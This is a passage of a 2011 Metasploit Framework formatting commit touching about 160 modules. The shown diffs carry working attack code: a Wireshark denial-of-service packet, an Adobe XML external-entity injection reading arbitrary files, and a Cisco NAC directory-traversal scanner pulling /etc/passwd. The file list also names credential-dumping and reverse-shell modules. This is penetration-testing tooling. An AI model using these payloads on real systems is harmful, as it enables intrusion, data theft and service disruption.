From 62c8c6ea9fa27a1a36f8cb36282e5f81654eb494 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Sun, 23 Oct 2011 11:56:13 +0000 Subject: [PATCH] big msftidy pass, ping me if there are issues git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da --- modules/auxiliary/dos/wireshark/chunked.rb | 52 +- .../scanner/http/adobe_xml_inject.rb | 10 +- .../http/cisco_nac_manager_traversal.rb | 166 ++-- .../scanner/http/dir_webdav_unicode_bypass.rb | 4 +- .../http/ms09_020_webdav_unicode_bypass.rb | 4 +- modules/auxiliary/scanner/http/scraper.rb | 4 +- .../scanner/oracle/isqlplus_login.rb | 3 +- .../scanner/postgres/postgres_login.rb | 9 +- .../auxiliary/scanner/sap/sap_icm_urlscan.rb | 314 ++++---- .../scanner/sap/sap_mgmt_con_abaplog.rb | 0 .../scanner/sap/sap_mgmt_con_brute_login.rb | 0 .../scanner/sap/sap_mgmt_con_extractusers.rb | 0 .../scanner/sap/sap_mgmt_con_getenv.rb | 0 .../scanner/sap/sap_mgmt_con_getlogfiles.rb | 0 .../sap/sap_mgmt_con_getprocessparameter.rb | 384 +++++----- .../sap/sap_mgmt_con_instanceproperties.rb | 0 .../scanner/sap/sap_mgmt_con_listlogfiles.rb | 0 .../scanner/sap/sap_mgmt_con_startprofile.rb | 0 .../scanner/sap/sap_mgmt_con_version.rb | 0 .../scanner/sap/sap_service_discovery.rb | 0 modules/auxiliary/scanner/voice/recorder.rb | 4 +- modules/auxiliary/server/capture/smb.rb | 10 +- .../auxiliary/server/webkit_xslt_dropper.rb | 2 +- modules/auxiliary/spoof/wifi/airpwn.rb | 6 +- .../auxiliary/sqli/oracle/jvm_os_code_10g.rb | 14 +- modules/auxiliary/vsploit/pii/web_pii.rb | 4 +- .../linux/pptp/poptop_negative_read.rb | 5 +- .../exploits/multi/http/glassfish_deployer.rb | 20 +- .../solaris/sunrpc/sadmind_adm_build_path.rb | 4 +- .../exploits/solaris/sunrpc/sadmind_exec.rb | 4 +- .../unix/webapp/php_vbulletin_template.rb | 4 +- .../exploits/unix/webapp/php_xmlrpc_eval.rb | 4 +- .../adobe_shockwave_rcsl_corruption.rb | 7 +- .../windows/browser/citrix_gateway_actx.rb | 2 +- .../browser/mozilla_interleaved_write.rb | 4 +- .../windows/browser/mozilla_mchannel.rb | 6 +- .../browser/ms08_078_xml_corruption.rb | 20 +- .../windows/browser/ms10_002_aurora.rb | 5 +- .../browser/ms10_042_helpctr_xss_cmd_exec.rb | 4 +- .../browser/ms11_050_mshtml_cobjectelement.rb | 3 +- .../novelliprint_getdriversettings_2.rb | 2 +- .../exploits/windows/browser/pcvue_func.rb | 64 +- .../exploits/windows/browser/teechart_pro.rb | 46 +- .../email/ms10_045_outlook_ref_only.rb | 5 +- .../windows/fileformat/adobe_libtiff.rb | 5 +- .../fileformat/adobe_pdf_embedded_exe.rb | 4 +- .../fileformat/adobe_pdf_embedded_exe_nojs.rb | 3 +- .../windows/fileformat/deepburner_path.rb | 4 +- .../fileformat/esignal_styletemplate_bof.rb | 0 .../windows/fileformat/ezip_wizard_bof.rb | 14 +- .../fileformat/foxit_reader_filewrite.rb | 2 +- .../windows/fileformat/scadaphone_zip.rb | 11 +- modules/exploits/windows/http/hp_nnm_ovas.rb | 7 +- .../windows/http/hp_power_manager_filename.rb | 2 +- .../exploits/windows/http/osb_uname_jlist.rb | 1 + .../windows/misc/wireshark_packet_dect.rb | 3 +- .../payloads/singles/linux/armle/adduser.rb | 4 + modules/payloads/singles/linux/x64/exec.rb | 12 + .../singles/linux/x64/shell_bind_tcp.rb | 12 + .../singles/linux/x64/shell_reverse_tcp.rb | 12 + modules/payloads/singles/windows/exec.rb | 1 + .../payloads/singles/windows/loadlibrary.rb | 1 + .../payloads/stagers/java/reverse_https.rb | 2 +- .../payloads/stagers/linux/x64/bind_tcp.rb | 12 + .../payloads/stagers/linux/x64/reverse_tcp.rb | 12 + modules/payloads/stages/linux/x64/shell.rb | 12 + .../payloads/stages/osx/x86/bundleinject.rb | 1 + modules/payloads/stages/windows/dllinject.rb | 1 + .../stages/windows/patchupdllinject.rb | 1 + modules/post/multi/gather/dns_bruteforce.rb | 8 +- modules/post/multi/gather/dns_srv_lookup.rb | 38 +- modules/post/multi/gather/ping_sweep.rb | 6 +- modules/post/multi/manage/system_session.rb | 22 +- modules/post/windows/gather/arp_scanner.rb | 8 +- modules/post/windows/gather/bitcoin_jacker.rb | 2 +- modules/post/windows/gather/cachedump.rb | 2 +- .../gather/credentials/enum_cred_store.rb | 12 +- .../gather/credentials/filezilla_server.rb | 6 +- .../windows/gather/credentials/outlook.rb | 66 +- .../post/windows/gather/credentials/vnc.rb | 28 +- .../gather/credentials/windows_autologin.rb | 5 +- modules/post/windows/gather/dumplinks.rb | 4 +- modules/post/windows/gather/enum_dirperms.rb | 10 +- .../windows/gather/enum_ms_product_keys.rb | 29 +- modules/post/windows/gather/memory_grep.rb | 15 +- modules/post/windows/gather/reverse_lookup.rb | 14 +- modules/post/windows/gather/usb_history.rb | 8 +- modules/post/windows/manage/autoroute.rb | 6 +- modules/post/windows/manage/delete_user.rb | 6 +- plugins/db_credcollect.rb | 4 +- plugins/ips_filter.rb | 8 +- plugins/lab.rb | 197 ++--- plugins/msfd.rb | 4 +- plugins/nessus.rb | 719 +++++++++--------- plugins/nexpose.rb | 68 +- plugins/openvas.rb | 52 +- plugins/pcap_log.rb | 10 +- plugins/wmap.rb | 330 ++++---- plugins/xmlrpc.rb | 2 +- scripts/meterpreter/arp_scanner.rb | 22 +- scripts/meterpreter/autoroute.rb | 1 + scripts/meterpreter/checkvm.rb | 64 +- scripts/meterpreter/credcollect.rb | 1 + scripts/meterpreter/domain_list_gen.rb | 22 +- scripts/meterpreter/duplicate.rb | 6 +- scripts/meterpreter/enum_chrome.rb | 10 +- scripts/meterpreter/enum_firefox.rb | 54 +- scripts/meterpreter/enum_powershell_env.rb | 1 + scripts/meterpreter/enum_putty.rb | 1 + scripts/meterpreter/enum_vmware.rb | 5 +- scripts/meterpreter/event_manager.rb | 3 +- scripts/meterpreter/get_application_list.rb | 20 +- scripts/meterpreter/get_env.rb | 1 + scripts/meterpreter/get_filezilla_creds.rb | 7 +- scripts/meterpreter/get_local_subnets.rb | 11 +- scripts/meterpreter/get_valid_community.rb | 3 + scripts/meterpreter/getcountermeasure.rb | 9 +- scripts/meterpreter/gettelnet.rb | 4 +- scripts/meterpreter/hashdump.rb | 35 +- scripts/meterpreter/hostsedit.rb | 1 + scripts/meterpreter/keylogrecorder.rb | 2 +- scripts/meterpreter/killav.rb | 1 + scripts/meterpreter/metsvc.rb | 1 + scripts/meterpreter/migrate.rb | 1 + scripts/meterpreter/multi_console_command.rb | 46 +- scripts/meterpreter/multicommand.rb | 19 +- scripts/meterpreter/multiscript.rb | 1 + scripts/meterpreter/netenum.rb | 314 ++++---- scripts/meterpreter/panda_2007_pavsrv51.rb | 25 +- scripts/meterpreter/pml_driver_config.rb | 1 + scripts/meterpreter/powerdump.rb | 5 +- scripts/meterpreter/prefetchtool.rb | 15 +- scripts/meterpreter/process_memdump.rb | 24 +- scripts/meterpreter/remotewinenum.rb | 86 +-- scripts/meterpreter/scheduleme.rb | 1 + scripts/meterpreter/schelevator.rb | 1 + scripts/meterpreter/schtasksabuse.rb | 13 +- scripts/meterpreter/screen_unlock.rb | 6 +- scripts/meterpreter/screenspy.rb | 74 +- scripts/meterpreter/search_dwld.rb | 1 + .../service_permissions_escalate.rb | 404 +++++----- scripts/meterpreter/sound_recorder.rb | 2 +- scripts/meterpreter/srt_webdrive_priv.rb | 4 +- scripts/meterpreter/uploadexec.rb | 1 + .../meterpreter/virtualbox_sysenter_dos.rb | 2 + scripts/meterpreter/virusscan_bypass.rb | 413 +++++----- scripts/meterpreter/vnc.rb | 1 + scripts/meterpreter/webcam.rb | 4 +- scripts/meterpreter/win32-sshclient.rb | 1 + scripts/meterpreter/win32-sshserver.rb | 1 + scripts/meterpreter/winbf.rb | 146 ++-- scripts/meterpreter/wmic.rb | 4 +- scripts/shell/migrate.rb | 1 + scripts/shell/spawn_meterpreter.rb | 1 + tools/import_webscarab.rb | 3 +- tools/list_interfaces.rb | 10 +- tools/lm2ntcrack.rb | 80 +- tools/vxdigger.rb | 2 + tools/vxencrypt.rb | 4 +- tools/vxmaster.rb | 2 + 160 files changed, 2626 insertions(+), 2405 deletions(-) mode change 100755 => 100644 modules/auxiliary/scanner/http/scraper.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb mode change 100755 => 100644 modules/auxiliary/scanner/sap/sap_service_discovery.rb mode change 100755 => 100644 modules/exploits/multi/http/glassfish_deployer.rb mode change 100755 => 100644 modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb mode change 100755 => 100644 modules/payloads/singles/linux/armle/adduser.rb mode change 100755 => 100644 modules/post/windows/gather/bitcoin_jacker.rb mode change 100755 => 100644 scripts/meterpreter/get_valid_community.rb mode change 100755 => 100644 scripts/meterpreter/virusscan_bypass.rb diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index 09101f28ce..a7af981094 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -57,8 +57,56 @@ class Metasploit3 < Msf::Auxiliary p.tcp_sport = datastore['SPORT'].to_i p.tcp_window = 3072 - # That's some mighty fine ASCII right there. - p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a" + # The following hex blob contains an HTTP response with a chunked-encoding + # length of 0. The ASCII version is below in a block comment. + # + # We represent it like this to prevent tools from mangling the carriage + # returns within it. + # + p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" + + "\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32" + + "\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39" + + "\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a" + + "\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28" + + "\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20" + + "\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31" + + "\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61" + + "\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c" + + "\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f" + + "\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65" + + "\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50" + + "\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34" + + "\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" + + "\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" + + "\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50" + + "\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74" + + "\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33" + + "\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22" + + "\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20" + + "\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20" + + "\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20" + + "\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78" + + "\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e" + + "\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30" + + "\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f" + + "\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" + + "\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74" + + "\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d" + + "\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f" + + "\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53" + + "\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45" + + "\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30" + + "\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64" + + "\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44" + + "\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a" + + "\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78" + + "\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e" + + "\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72" + + "\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a" + + "\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" + + "\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74" + + "\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d" + + "\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a" p.recalc capture_sendto(p, rhost) diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index fe34ed4507..f8d7fec7e4 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb @@ -64,7 +64,15 @@ class Metasploit3 < Msf::Auxiliary "/lcds-samples/messagebroker/httpsecure", # LCDS -- SSL ] - postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?><\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>bodyclientIdcorrelationIddestinationheadersmessageIdoperationtimestamptimeToLiveDSIdDSMessagingVersionnil1&x3;500" + postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?>" + postrequest << "<\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>" + postrequest << "" + postrequest << "" + postrequest << "bodyclientIdcorrelationIddestination" + postrequest << "headersmessageIdoperationtimestamp" + postrequest << "timeToLive" + postrequest << "DSIdDSMessagingVersionnil" + postrequest << "1&x3;500" path.each do | check | diff --git a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb index 3cc13337db..c366eca294 100644 --- a/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb @@ -1,84 +1,84 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::WMAPScanServer - include Msf::Auxiliary::Scanner - - def initialize - super( - 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability', - 'Version' => '$Revision$', - 'Description' => %q{ - This module tests whether a directory traversal vulnerablity is present - in versions of Cisco Network Access Manager 4.8.x You may wish to change - FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment. - }, - 'References' => - [ - [ 'CVE', '2011-3305' ], +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::WMAPScanServer + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability', + 'Version' => '$Revision$', + 'Description' => %q{ + This module tests whether a directory traversal vulnerablity is present + in versions of Cisco Network Access Manager 4.8.x You may wish to change + FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment. + }, + 'References' => + [ + [ 'CVE', '2011-3305' ], [ 'OSVDB', '76080'], - [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ], - [ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ] - ], - 'Author' => [ 'nenad' ], - 'License' => MSF_LICENSE - ) - - register_options( - [ - Opt::RPORT(443), - OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']), - OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]), - ], self.class) - end - - def run_host(ip) - - traversal = '../../' - part1= '/admin/file_download?tag=' - part2 = '&fileType=snapshot' - - begin - print_status("Attempting to connect to #{rhost}:#{rport}") - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => '/admin', - }, 25) - - if (res) - 1.upto(datastore['MAXDIRS']) do |level| - try = traversal * level - traversalstring = part1 + try + datastore['FILE'] + part2 - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => traversalstring, - }, 25) - if (res and res.code == 200) - print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}") - break - elsif (res and res.code) - print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n") - end - end - end - - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE - end - end -end + [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ], + [ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ] + ], + 'Author' => [ 'nenad' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(443), + OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']), + OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]), + ], self.class) + end + + def run_host(ip) + + traversal = '../../' + part1= '/admin/file_download?tag=' + part2 = '&fileType=snapshot' + + begin + print_status("Attempting to connect to #{rhost}:#{rport}") + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => '/admin', + }, 25) + + if (res) + 1.upto(datastore['MAXDIRS']) do |level| + try = traversal * level + traversalstring = part1 + try + datastore['FILE'] + part2 + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => traversalstring, + }, 25) + if (res and res.code == 200) + print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}") + break + elsif (res and res.code) + print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n") + end + end + end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end diff --git a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb index 3fd7f56921..6899c59509 100644 --- a/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb @@ -124,7 +124,9 @@ class Metasploit3 < Msf::Auxiliary return if not conn - webdav_req = %q|| + webdav_req = '' + + '' + + '' File.open(datastore['DICTIONARY'], 'rb').each do |testf| begin diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index e8409a2b63..2f8ea1a9f3 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -59,7 +59,9 @@ class Metasploit3 < Msf::Auxiliary vhost = datastore['VHOST'] || wmap_target_host prot = datastore['SSL'] ? 'https' : 'http' - webdav_req = %q|| + webdav_req = '' + + '' + + '' begin res = send_request_cgi({ diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb old mode 100755 new mode 100644 index 138a884a1f..fc3cabca95 --- a/modules/auxiliary/scanner/http/scraper.rb +++ b/modules/auxiliary/scanner/http/scraper.rb @@ -1,5 +1,5 @@ ## -# $Id: $ +# $Id$ ## ## @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'HTTP Page Scraper', - 'Version' => '$Revision: 13183 $', + 'Version' => '$Revision$', 'Description' => 'Scrap defined data from a specific web page based on a regular expresion', 'Author' => ['et'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/oracle/isqlplus_login.rb b/modules/auxiliary/scanner/oracle/isqlplus_login.rb index 5f1b3ad6f5..7dff63cfcc 100644 --- a/modules/auxiliary/scanner/oracle/isqlplus_login.rb +++ b/modules/auxiliary/scanner/oracle/isqlplus_login.rb @@ -46,7 +46,8 @@ class Metasploit3 < Msf::Auxiliary OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']), OptString.new('SID', [ false, 'Oracle SID' ]), OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]), - OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]), + OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", + File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]), OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]), ], self.class) diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 25e0cbc1d2..1b98d6b0f6 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -40,9 +40,12 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]), - OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]), - OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]), + OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", + File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]), + OptPath.new('USER_FILE', [ false, "File containing users, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]), + OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]), ], self.class) deregister_options('SQL') diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 